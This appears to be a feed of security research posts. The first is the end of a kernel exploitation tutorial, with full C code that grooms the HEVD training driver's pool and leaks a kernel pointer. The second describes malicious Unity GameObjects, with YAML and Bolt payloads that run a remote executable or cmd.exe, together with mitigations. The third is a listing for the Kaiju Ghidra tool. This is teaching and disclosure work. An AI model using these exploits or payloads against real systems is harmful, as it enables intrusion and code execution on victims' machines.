So what kind of object would we like to place in the “holes” we want to poke? This object is the one we want to leak back to user mode, so it should contain either valuable kernel information or a function pointer. This is the hardest/most tedious part of pool corruption, is finding something that is not only the size needed, but also contains valuable information. This especially bodes true if you cannot use a generic Windows object and need to use a structure that is specific to a driver.

In any event, this next part is a bit “simplified”. It will take a bit of reverse engineering/debugging to calls that allocate pool chunks for objects to find a suitable candidate. The way to approach this, at least in my opinion, would be as follows:

  1. Identify calls to ExAllocatePoolWithTag, or similar APIs
  2. Narrow this list down by finding calls to the aforementioned API(s) that are allocated within the pool you are able to corrupt (e.g. if I have a vulnerability on the NonPagedPoolNx, find an allocation on the NonPagedPoolNx)
  3. Narrow this list further by finding calls that perform the before sentiments, but for the given size pool chunk you need
  4. If you have made it this far, narrow this down further by finding an object with all of the before attributes and with an interesting member, such as a function pointer

However, slightly easier because we can use the source code, let’s find a suitable object within HEVD. In HEVD there is an object which contains a function pointer, called USE_AFTER_FREE_NON_PAGED_POOL_NX. It is constructed as such, within UseAfterFreeNonPagedPoolNx.h

This structure is used in a function call within UseAfterFreeNonPagedPoolNx.c and the Buffer member is initialized with 0x41 characters.

The Callback member, which is of type FunctionCallback and is defined as such in Common.h: typedef void (*FunctionPointer)(void);, is set to the memory address of UaFObjectCallbackNonPagedPoolNx, which a function located in UseAfterFreeNonPagedPoolNx.c shown two images ago! This means a member of this structure will contain a function pointer within HEVD, a kernel mode address. We know by the name that this object will be allocated on the NonPagedPoolNx, but you could still validate this by performing static analysis on the call to ExAllocatePoolWithTag to see what value is specified for POOL_TYPE.

This seems like a perfect candidate! The goal will be to leak this structure back to user mode with the out-of-bounds read vulnerability! The only factor that remains is size - we need to make sure this object is also 0x70 bytes in size, so it lands within the same pool page we control.

Let’s test this in WinDbg. In order to reach the AllocateUaFObjectNonPagedPoolNx function we need to interact with the IOCTL handler for this particular routine, which is defined in NonPagedPoolNx.c.

The IOCTL code needed to reach this routine, for brevity, is 0x00222053. Let’s set a breakpoint on HEVD!AllocateUaFObjectNonPagedPoolNx in WinDbg, issue a DeviceIoControl call to this IOCTL without any buffers, and see what size is being used in the call to ExAllocatePoolWithTag to allocate this object.

Perfect! Slightly contrived, but nonetheless true, the object being created here is also 0x70 bytes (without the _POOL_HEADER structure) - meaning this object should be allocated adjacent to any free slots within the page our event objects live! Let’s update our POC to perform the following:

  1. Free every other event object
  2. Replace every other event object (5000/2 = 2500) with a USE_AFTER_FREE_NON_PAGED_POOL_NX object

Using the memcpy routine (RtlCopyMemory) from the original routine for the out-of-bounds read IOCTL invocation into the vulnerable pool chunk, we can inspect the target pool chunk used in the copy operation, which will be the chunk bubbled back up to user mode, which could showcase that our event objects are now adjacent to multiple USE_AFTER_FREE_NON_PAGED_POOL_NX objects.

We can see that the Hack tagged chunks, which are USE_AFTER_FREE_NON_PAGED_POOL_NX chunks, are pretty much adjacent with the event objects! Even if not every object is perfectly adjacent to the previous event object, this is not a worry to us because the vulnerability allows us to specify how much of the data from the adjacent chunks we would like to return to user mode anyways. This means we could specify an arbitrary amount, such as 0x1000, and that is how many bytes would be returned from the adjacent chunks.

Since there are many chunks which are adjacent, it will result in an information leak. The reason for this is because the kLFH has a bit of “funkiness” going on. This isn’t necessarily due to any sort of kLFH “randomization”, I found out after talking with my colleague Yarden Shafir, where the free chunks will be/where the allocations will occur, but due to the complexity of the subsegment locations, caching, etc. Things can get complex quite quickly. This is beyond the scope of this blog post.

The only time this becomes an issue, however, is when clients can read out-of-bounds but cannot specify how many bytes out-of-bounds they can read. This would result in exploits needing to run a few times in order to leak a valid kernel address, until the chunks become adjacent. However, someone who is better at pool grooming than myself could easily figure this out I am sure :).

Now that we can groom the pool decently enough, the next step is to replace the rest of the event objects with vulnerable objects from the out-of-bounds read vulnerability! The desired layout of the pool will be this:

VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX 

Why do we want this to be the desired layout? Each of the VULNERABLE_OBJECTS can read additional data from adjacent chunks. Since (theoretically) the next adjacent chunk should be USE_AFTER_FREE_NON_PAGED_POOL_NX, we should be returning this entire chunk to user mode. Since this structure contains a function pointer in HEVD, we can then bypass kASLR by leaking a pointer from HEVD! To do this, we will need to perform the following steps:

  1. Free the rest of the event objects
  2. Perform a number of calls to the IOCTL handler for allocating vulnerable chunks

For step two, we don’t want to perform 2500 DeviceIoControl calls, as there is potential for the one of the last memory address in the page to be set to one of our vulnerable objects. If we specify we want to read 0x1000 bytes, and if our vulnerable object is at the end of the last valid page for the pool, it will try reading from the address 0x1000 bytes away, which may reside in a page which is not currently committed to memory, causing a DOS by referencing invalid memory. To compensate for this, we only want to allocate 100 vulnerable objects, as one of them will almost surely be allocated in an adjacent block to a USE_AFTER_FREE_NON_PAGED_POOL_NX object.

To do this, let’s update the code as follows.

After freeing the event objects and reading back data from adjacent chunks, a for loop is instituted to parse the output for anything that is sign extended (a kernel-mode address). Since the output buffer will be returned in an unsigned long long array, the size of a 64-bit address, and since the address we want to leak from is the first member of the adjacent chunk, after the leaked _POOL_HEADER, it should be placed into a clean 64-bit variable, and therefore easily parsed. Once we have leaked the address of the pointer to the function, we then can calculate the distance from the function to the base of HEVD, add the distance, and then obtain the base of HEVD!

Executing the final exploit, leveraging the same breakpoint on final HEVD!memcpy call (remember, we are executing 100 calls to the final DeviceIoControl routine, which invokes the RtlCopyMemory routine, meaning we need to step through 99 times to hit the final copy back into user mode), we can see the layout of the pool.

The above image is a bit difficult to decipher, given that both the vulnerable chunks and the USE_AFTER_FREE_NON_PAGED_POOL_NX chunks both have Hack tags. However, if we take the adjacent chunk to the current chunk, which is a vulnerable chunk we can read past and denoted by an asterisk, and after parsing it as a USE_AFTER_FREE_NON_PAGED_POOL_NX object, we can see clearly that this object is of the correct type and contains a function pointer within HEVD!

We can then subtract the distance from this function pointer to the base of HEVD, and update our code accordingly. We can see the distance is 0x880cc, so adding this to the code is trivial.

After performing the calculation, we can see we have bypassed kASLR, from low integrity, without any calls to EnumDeviceDrivers or similar APIs!

The final code can be seen below.

// HackSysExtreme Vulnerable Driver: Pool Overflow/Memory Disclosure
// Author: Connor McGarr(@33y0re)

// Vulnerability description: Arbitrary read primitive
// User-mode clients have the ability to control the size of an allocated pool chunk on the NonPagedPoolNx
// This pool chunk is 0x80 bytes (including the header)
// There is an object, a UafObject created by HEVD, that is 0x80 bytes in size (including the header) and contains a function pointer that is to be read -- this must be used due to the kLFH, which is only groomable for sizes in the same bucket
// CreateEventA can be used to allocate 0x80 byte objects, including the size of the header, which can also be used for grooming

#include <windows.h>
#include <stdio.h>

// Fill the holes in the NonPagedPoolNx of 0x80 bytes
void memLeak(HANDLE driverHandle)
{
  // Array to manage handles opened by CreateEventA
  HANDLE eventObjects[5000];

  // Spray 5000 objects to fill the new page
  for (int i = 0; i <= 5000; i++)
  {
    // Create the objects
    HANDLE tempHandle = CreateEventA(
      NULL,
      FALSE,
      FALSE,
      NULL
    );

    // Assign the handles to the array
    eventObjects[i] = tempHandle;
  }

  // Check to see if the first handle is a valid handle
  if (eventObjects[0] == NULL)
  {
    printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

    // Close half of the handles
    for (int i = 0; i <= 5000; i += 2)
    {
      BOOL tempHandle1 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle1)
      {
        printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    printf("[+] Poked holes in the new pool page!\n");

    // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
    // kLFH should automatically fill the freed holes with the UAF objects
    DWORD bytesReturned;

    for (int i = 0; i < 2500; i++)
    {
      DeviceIoControl(
        driverHandle,
        0x00222053,
        NULL,
        0,
        NULL,
        0,
        &bytesReturned,
        NULL
      );
    }

    printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

    // Close the rest of the event objects
    for (int i = 1; i <= 5000; i += 2)
    {
      BOOL tempHandle2 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle2)
      {
        printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    // Array to store the buffer (output buffer for DeviceIoControl) and the base address
    unsigned long long outputBuffer[100];
    unsigned long long hevdBase;

    // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
    // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

    for (int i = 0; i <= 100; i++)
    {
      // Return buffer
      DWORD bytesReturned1;

      DeviceIoControl(
        driverHandle,
        0x0022204f,
        NULL,
        0,
        &outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned1,
        NULL
      );

    }

    printf("[+] Successfully triggered the out-of-bounds read!\n");

    // Parse the output
    for (int i = 0; i <= 100; i++)
    {
      // Kernel mode address?
      if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
      {
        printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
        printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

        // Store the variable for future usage
        hevdBase = outputBuffer[i] + 0x880CC;
        break;
      }
    }
  }
}

void main(void)
{
  // Open a handle to the driver
  printf("[+] Obtaining handle to HEVD.sys...\n");

  HANDLE drvHandle = CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver",
    GENERIC_READ | GENERIC_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (drvHandle == (HANDLE)-1)
  {
    printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    memLeak(drvHandle);
  }
}

Conclusion

Kernel exploits from browsers, which are sandboxed, require such leaks to perform successful escalation of privileges. In part two of this series we will combine this bug with HEVD’s pool overflow vulnerability to achieve a read/write primitive and perform successful EoP! Please feel free to reach out with comments, questions, or corrections!

Peace, love, and positivity :-)

☑ ★ ✇ Include Security Research Blog

Hacking Unity Games with Malicious GameObjects

By: Jason Kielpinski

At IncludeSec our clients are asking us to hack on all sorts of crazy applications from mass scale web systems to IoT devices and low-level firmware. Something that we’re seeing more of is hacking virtual reality systems and mass scale video games so we had a chance to do some research and came up with what we believe to be a novel attack against Unity-powered games!

Specifically, this post will outline:

  • Two ways I found that GameObjects (a non-code asset type) can be crafted to cause arbitrary code to run.
  • Five possible ways an attacker might use a malicious GameObject to compromise a Unity game.
  • How game developers can mitigate the risk.

Unity has also published their own blog post on this subject. Be sure to check that out for their specific recommendations and how to protect against this sort of vulnerability.

Terminology

First a brief primer on the terms I’m going to use for those less familiar with Unity.

  • GameObjects are entities in Unity that can have any number of components attached.
  • Components are added to GameObjects to make them do things. They include Unity built-in components, like UI elements and sprite renderers, as well as custom scripted components used to build the game logic.
  • Assets are the elements that make up the game. This includes images, sounds, scripts, and GameObjects, among other things.
  • AssetBundles are a way to package non-code assets and allow them to be loaded at runtime (from the web or locally). They are used to decrease initial download size, allow downloadable content, as well as sometimes to enable modding of the game.

Ways a malicious GameObject could get into a game

Before going into details about how a GameObject could execute code, let’s talk about how it would get in the game in the first place so that we’re clear on the attack scenarios. I came up with five ways a malicious GameObject might find its way into a Unity game:

Way 1: the most obvious route is if the game developer downloaded it and added it to the game project. This might be an asset they purchased on the Unity Asset Store, or something they found on GitHub that solved a problem they were having.

Way 2: Unity AssetBundles allow non-script assets (including GameObjects) to be imported into a game at runtime. There may be an assumption that these assets are safe, since they contain no custom script assets, but as you’ll see further into the post that is not a safe assumption. For example, sometimes AssetBundles are used to add modding functionality to a game. If that’s the case, then third-party mods downloaded by a user can unexpectedly cause code execution, similar to running untrusted programs from the internet.

Way 3: AssetBundles can be downloaded from the internet at runtime without transport encryption enabling man-in-the-middle attacks. The Unity documentation has an example of how to do this, partially listed below:

UnityWebRequest uwr = UnityWebRequestAssetBundle.GetAssetBundle("http://www.my-server.com/mybundle")

In the Unity-provided example, the AssetBundle is being downloaded over HTTP. If an AssetBundle is downloaded over HTTP (which lacks the encryption and certificate validation of HTTPS), an attacker with a man-in-the-middle position of whoever is running the game could tamper with the AssetBundle in transit and replace it with a malicious one. This could, for example, affect players who are playing on an untrusted network such as a public WiFi access point.

Way 4: AssetBundles can be downloaded from the internet at runtime with transport encryption but man-in-the-middle attacks might still be possible.

Unity has this to say about certificate validation when using UnityWebRequests:

Some platforms will validate certificates against a root certificate authority store. Other platforms will simply bypass certificate validation completely.

According to the docs, even if you use HTTPS, on certain platforms Unity won’t check certificates to verify it’s communicating with the intended server, opening the door for possible AssetBundle tampering. It’s possible to create your own certificate handler, but only on specific platforms:

Note: Custom certificate validation is currently only implemented for the following platforms – Android, iOS, tvOS and desktop platforms.

I could not find information about which platforms “bypass certificate validation completely”, but I’m guessing it’s the less-common ones? Still, if you’re developing a game that downloads AssetBundles, you might want to verify that certificate validation is working on the platforms you use.

Way 5: Malicious insider. A contributor on a development team or open source project wants to add some bad code to a game. But maybe the dev team has code reviews to prevent this sort of thing. Likely, those code reviews don’t extend to the GameObjects themselves, so the attacker smuggles their code into a GameObject that gets deployed with the game.

Crafting malicious GameObjects

I think it’s pretty obvious why you wouldn’t want arbitrary code running in your game — it might compromise players’ computers, steal their data, crash the game, etc. If the malicious code runs on a development machine, the attacker could potentially steal the source code or pivot to attack the studio’s internal network. Peter Clemenko had another interesting perspective on his blog: essentially, in the near-future augmented-reality cyberpunk ready-player-1 upcoming world an attacker may seek to inject things into a user’s reality to confuse, distract, annoy, and that might cause real-world harm.

So, how can non-script assets get code execution?

Method 1: UnityEvents

Unity has an event system that allows hooking up delegates in code that will be called when an event is triggered. You can use them in your custom scripts for game-specific events, and they are also used on Unity’s built-in UI components (such as Buttons) for event handlers (like onClick) . Additionally, you can add ones to objects such as PointerClick, PointerEnter, Scroll, etc. using an EventTrigger component

One-parameter UnityEvents can be exposed in the inspector by components. In normal usage, setting up a UnityEvent looks like this in the Unity inspector:

First you have to assign a GameObject to receive the event callback (in this case, “Main Camera”). Then you can look through methods and properties on any components attached to that GameObject, and select a handler method.

Many assets in Unity, including scenes and GameObject prefabs, are serialized as YAML files that store the various properties of the object. Opening up the object containing the above event trigger, the YAML looks like this:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 1978173272}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: 11500000, guid: d0b148fe25e99eb48b9724523833bab1, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  m_Delegates:
  - eventID: 4
    callback:
      m_PersistentCalls:
        m_Calls:
        - m_Target: {fileID: 963194228}
          m_TargetAssemblyTypeName: UnityEngine.Component, UnityEngine
          m_MethodName: SendMessage
          m_Mode: 5
          m_Arguments:
            m_ObjectArgument: {fileID: 0}
            m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
            m_IntArgument: 0
            m_FloatArgument: 0
            m_StringArgument: asdf
            m_BoolArgument: 0
          m_CallState: 2

The most important part is under m_Delegates — that’s what controls which methods are invoked when the event is triggered. I did some digging in the Unity C# source repo along with some experimenting to figure out what some of these properties are. First, to summarize my findings: UnityEvents can call any method that has a return type void and takes zero or one argument of a supported type. This includes private methods, setters, and static methods. Although the UI restricts you to invoking methods available on a specific GameObject, editing the object’s YAML does not have that restriction — they can call any method in a loaded assembly . You can skip to exploitation below if you don’t need more details of how this works.

Technical details

UnityEvents technically support delegate functions with anywhere from zero to four parameters, but unfortunately Unity does not use any UnityEvents with greater than one parameter for its built-in components (and I found no way to encode more parameters into the YAML). We are therefore limited to one-parameter functions for our attack.

The important fields in the above YAML are:

  • eventID — This is specific to EventTriggers (rather than UI components.) It specifies the type of event, PointerClick, PointerHover, etc. PointerClick is “4”.
  • m_TargetAssemblyTypeName — this is the fully qualified .NET type name that the event handler function will be called on. Essentially this takes the form: namespace.typename, assemblyname. It can be anything in one of the assemblies loaded by Unity, including all Unity engine stuff as well as a lot of .NET stuff.
  • m_callstate — Determines when the event triggers — only during a game, or also while using the Unity Editor:
    • 0 – UnityEventCallState.Off
    • 1 – UnityEventCallState.EditorAndRuntime
    • 2 – UnityEventCallState.RuntimeOnly
  • m_mode — Determines the argument type of the called function.
    • 0 – EventDefined
    • 1 – Void,
    • 2 – Object,
    • 3 – Int,
    • 4 – Float,
    • 5 – String,
    • 6 – Bool
  • m_target — Specify the Unity object instance that the method will be called on. Specifying m_target: {fileId: 0} allows static methods to be called.

Unity uses C# reflection to obtain the method to call based on the above. The code ultimately used to obtain the method is shown below:

objectType.GetMethod(functionName, BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance | BindingFlags.Static, null, argumentTypes, null);

With the binding flags provided, it’s possible to specify private or public methods, static or instance methods. When calling the function, a delegate is created with type UnityAction that has a return type of void — therefore, the specified function must have a void return type.

Exploitation

My goal after discovering the above was to find some method available in the default loaded assemblies fitting the correct form (static, return void, exactly 1 parameter) which would let me do Bad Things™. Ideally, I wanted to get arbitrary code execution, but other things could be interesting too. If I could hook up an event handler to something dangerous, we would have a malicious GameObject.

I was quickly able to get arbitrary code execution on Windows machines by invoking Application.OpenURL() with a UNC path pointing to a malicious executable on a network share. The attacker would host a malicious exe file, and wait for the game client to trigger the event. OpenURL will then download and execute the payload. 

Below is the event definition I used  in the object YAML:

- m_Target: {fileID: 0}
  m_TargetAssemblyTypeName: UnityEngine.Application, UnityEngine
  m_MethodName: OpenURL
  m_Mode: 5
  m_Arguments:
    m_ObjectArgument: {fileID: 0}
    m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
    m_IntArgument: 0
    m_FloatArgument: 0
    m_StringArgument: file://JASON-INCLUDESE/shared/calc.exe
    m_BoolArgument: 0
  m_CallState: 2

It sets an OnPointerClick handler on an object with a large bounding box (to ensure it gets triggered). When the victim user clicks, it retrieves calc.exe from a network share and executes it. In a hypothetical attack the exe file would likely be on the internet, but I hosted on my local network. Here’s a gif of what happens when you click the object:

This got arbitrary code execution on Windows from a malicious GameObject either in an AssetBundle or included in the project. However, the network drive method won’t work on non-Windows platforms unless they’ve specifically mounted a share, since they don’t automatically open UNC paths. What about those platforms?

Another interesting function is EditorUtility.OpenWithDefaultApp(). It takes a string path to a file, and opens it up with the system’s default app for this file type. One useful part is that it takes relative paths in the project. An attacker who can get malicious executables into your project can call this function with the relative path to their executable to get them to run.

For example, on macOS I compiled the following C program which writes “hello there” to /tmp/hello:

#include <stdio.h>;
int main() {
  FILE* fp = fopen("/tmp/hello");
  fprintf(fp, "hello there");
  fclose(fp);
  return 0;
}

I included the compiled binary in my Assets folder as “hello” (no extension — this is important!) Then I set up the following onClick event on a button:

m_OnClick:
  m_PersistentCalls:
    m_Calls:
    - m_Target: {fileID: 0}
      m_TargetAssemblyTypeName: UnityEditor.EditorUtility, UnityEditor
      m_MethodName: OpenWithDefaultApp
      m_Mode: 5
      m_Arguments:
        m_ObjectArgument: {fileID: 0}
        m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
        m_IntArgument: 0
        m_FloatArgument: 0
        m_StringArgument: Assets/hello
        m_BoolArgument: 0
      m_CallState: 2

It now executes the executable when you click the button:

This doesn’t work for AssetBundles though, because the unpacked contents of AssetBundles aren’t written to disk. Although the above might be an exploitation path in some scenarios, my main goal was to get code execution from AssetBundles, so I kept looking for methods that might let me do that on Mac (on Windows, it’s possible with OpenURL(), as previously shown). I used the following regex in SublimeText to search over the UnityCsReference repository for any matching functions that a UnityEvent could call: static( extern|) void [A-Za-z\w_]*\((string|int|bool|float) [A-Za-z\w_]*\)

After pouring over the 426 discovered methods, I fell a short of getting completely arbitrary code exec from AssetBundles on non-Windows platforms — although I still think it’s probably possible. I did find a bunch of other ways such a GameObject could do Bad Things™. This is just a small sampling:

Unity.CodeEditor.CodeEditor.SetExternalScriptEditor() Can change a user’s default code editor to arbitrary values. Setting it to a malicious UNC executable can achieve code execution whenever they trigger Unity to open a code editor, similar to the OpenURL exploitation path.
PlayerPrefs.DeleteAll() Delete all save games and other stored data.
UnityEditor.FileUtil.UnityDirectoryDelete() Invokes Directory.Delete() on the specified directory.
UnityEngine.ScreenCapture.CaptureScreenshot() Takes a screenshot of the game window to a specified file. Will automatically overwrite the specified file. Can be written to UNC paths in Windows.
UnityEditor.PlayerSettings.SetAdditionalIl2CppArgs() Add flags to be passed to the Il2Cpp compiler.
UnityEditor.BuildPlayerWindow.BuildPlayerAndRun() Trigger the game to build. In my testing I couldn’t get this to work, but combined with the Il2Cpp flag function above it could be interesting.
Application.Quit(), EditorApplication.Exit() Quit out of the game/editor.

Method 2: Visual scripting systems

There are various visual scripting systems for Unity that let you create logic without code. If you have imported one of these into your project, any third-party GameObject you import can use the visual scripting system. Some of the systems are more powerful or less powerful. I will focus on Bolt as an example since it’s pretty popular, Unity acquired it, and it’s now free. 

This attack vector was proposed on Peter Clemenko’s blog I mentioned earlier, but it focused on malicious entity injection — I think it should be clarified that, using Bolt, it’s possible for imported GameObjects to achieve arbitrary code execution as well, including shell command execution.

With the default settings, Bolt does not show many of the methods available to you in the loaded assemblies in its UI. Once again, though, you have more options if you edit the YAML than you do in the UI. For example, if you make a simple Bolt flow graph like the following:

The YAML looks like:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 2032548220}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: -57143145, guid: a040fb66244a7f54289914d98ea4ef7d, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  _data:
    _json: '{"nest":{"source":"Embed","macro":null,"embed":{"variables":{"collection":{"$content":[],"$version":"A"},"$version":"A"},"controlInputDefinitions":[],"controlOutputDefinitions":[],"valueInputDefinitions":[],"valueOutputDefinitions":[],"title":null,"summary":null,"pan":{"x":117.0,"y":-103.0},"zoom":1.0,"elements":[{"coroutine":false,"defaultValues":{},"position":{"x":-204.0,"y":-144.0},"guid":"a4dcd43b-833d-49f5-8642-b6c311cf324f","$version":"A","$type":"Bolt.Start","$id":"10"},{"chainable":false,"member":{"name":"OpenURL","parameterTypes":["System.String"],"targetType":"UnityEngine.Application","targetTypeName":"UnityEngine.Application","$version":"A"},"defaultValues":{"%url":{"$content":"https://includesecurity.com","$type":"System.String"}},"position":{"x":-59.0,"y":-145.0},"guid":"395d9bac-f1da-4173-9e4b-b19d156c9a0b","$version":"A","$type":"Bolt.InvokeMember","$id":"12"},{"sourceUnit":{"$ref":"10"},"sourceKey":"trigger","destinationUnit":{"$ref":"12"},"destinationKey":"enter","guid":"d9cae7fd-e05b-48c6-b16d-5f04b0c722a6","$type":"Bolt.ControlConnection"}],"$version":"A"}}}'
    _objectReferences: []

The _json field seems to be where the meat is. Un-minifying it and focusing on the important parts:

[...]
  "member": {
    "name": "OpenURL",
    "parameterTypes": [
        "System.String"
    ],
    "targetType": "UnityEngine.Application",
    "targetTypeName": "UnityEngine.Application",
    "$version": "A"
  },
  "defaultValues": {
    "%url": {
        "$content": "https://includesecurity.com",
        "$type": "System.String"
    }
  },
[...]

It can be changed from here to a version that runs arbitrary shell commands using System.Diagnostics.Process.Start:

[...]
{
  "chainable": false,
  "member": {
    "name": "Start",
    "parameterTypes": [
        "System.String",
        "System.String"
    ],
    "targetType": "System.Diagnostics.Process",
    "targetTypeName": "System.Diagnostics.Process",
    "$version": "A"
  },
  "defaultValues": {
    "%fileName": {
        "$content": "cmd.exe",
        "$type": "System.String"
    },
    "%arguments": {
         "$content": "/c calc.exe",
         "$type": "System.String"
    }
  },
[...]

This is what that looks like now in Unity:

A malicious GameObject imported into a project that uses Bolt can do anything it wants.

How to prevent this

Third-party assets

It’s unavoidable for many dev teams to use third-party assets in their game, be it from the asset store or an outsourced art team. Still, the dev team can spend some time scrutinizing these assets before inclusion in their game — first evaluating the asset creator’s trustworthiness before importing it into their project, then reviewing it (more or less carefully depending on how much you trust the creator). 

AssetBundles

When downloading AssetBundles, make sure they are hosted securely with HTTPS. You should also double check that Unity validates HTTPS certificates on all platforms your game runs — do this by setting up a server with a self-signed certificate and trying to download an AssetBundle from it over HTTPS. On the Windows editor, where certificate validation is verified as working, doing this creates an error like the following and sets the UnityWebRequest.isNetworkError property to true:

If the download works with no error, then an attacker could insert their own HTTPS server in between the client and server, and inject a malicious AssetBundle. 

If Unity does not validate certificates on your platform and you are not on one of the platforms that allows for custom certificate checking, you probably have to implement your own solution — likely integrating a different HTTP client that does check certificates and/or signing the AssetBundles in some way.

When possible, don’t download AssetBundles from third-parties. This is impossible, though, if you rely on AssetBundles for modding functionality. In that case, you might try to sanitize objects you receive. I know that Bolt scripts are dangerous, as well as anything containing a UnityEvent (I’m aware of EventTriggers and various UI elements). The following code strips these dangerous components recursively from a downloaded GameObject asset before instantiating:

private static void SanitizePrefab(GameObject prefab)
{
    System.Type[] badComponents = new System.Type[] {
        typeof(UnityEngine.EventSystems.EventTrigger),
        typeof(Bolt.FlowMachine),
        typeof(Bolt.StateMachine),
        typeof(UnityEngine.EventSystems.UIBehaviour)
    };

    foreach (var componentType in badComponents) {
        foreach (var component in prefab.GetComponentsInChildren(componentType, true)) {
            DestroyImmediate(component, true);
        }
    }
}

public static Object SafeInstantiate(GameObject prefab)
{
    SanitizePrefab(prefab);
    return Instantiate(prefab);
}

public void Load()
{
    AssetBundle ab = AssetBundle.LoadFromFile(Path.Combine(Application.streamingAssetsPath, "evilassets"));

    GameObject evilGO = ab.LoadAsset<GameObject>("EvilGameObject");
    GameObject evilBolt = ab.LoadAsset<GameObject>("EvilBoltObject");
    GameObject evilUI = ab.LoadAsset<GameObject>("EvilUI");

    SafeInstantiate(evilGO);
    SafeInstantiate(evilBolt);
    SafeInstantiate(evilUI);

    ab.Unload(false);
}

Note that we haven’t done a full audit of Unity and we pretty much expect that there are other tricks with UnityEvents, or other ways for a GameObject to get code execution. But the code above at least protects against all of the attacks outlined in this blog.

If it’s essential to allow any of these things (such as Bolt scripts) to be imported into your game from AssetBundles, it gets trickier. Most likely the developer will want to create a white list of methods Bolt is allowed to call, and then attempt to remove any methods not on the whitelist before instantiating dynamically loaded GameObjects containing Bolt scripts. The whitelist could be something like “only allow methods in the MyCompanyName.ModStuff namespace.”  Allowing all of the UnityEngine namespace would not be good enough because of things like Application.OpenURL, but you could wrap anything you need in another namespace. Using a blacklist to specifically reject bad methods is not recommended, the surface area is just too large and it’s likely something important will be missed, though a combination of white list and black list may be possible with high confidence.

In general game developers need to decide how much protection they want to add at the app layer vs. putting the risk decision in the hands of a game end-user’s own judgement on what mods to run, just like it’s on them what executables they download. That’s fair, but it might be a good idea to at least give the gamers a heads up that this could be dangerous via documentation and notifications in the UI layer. They may not expect that mods could do any harm to their computer, and might be more careful once they know.

As mentioned above, if you’d like to read more about Unity’s fix for this and their recommendations, be sure to check out their blog post!

The post Hacking Unity Games with Malicious GameObjects appeared first on Include Security Research Blog.

☑ ★ ✇ KitPloit - PenTest & Hacking Tools

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite

By: Zion3R


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET causing many more unintended collisions). As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

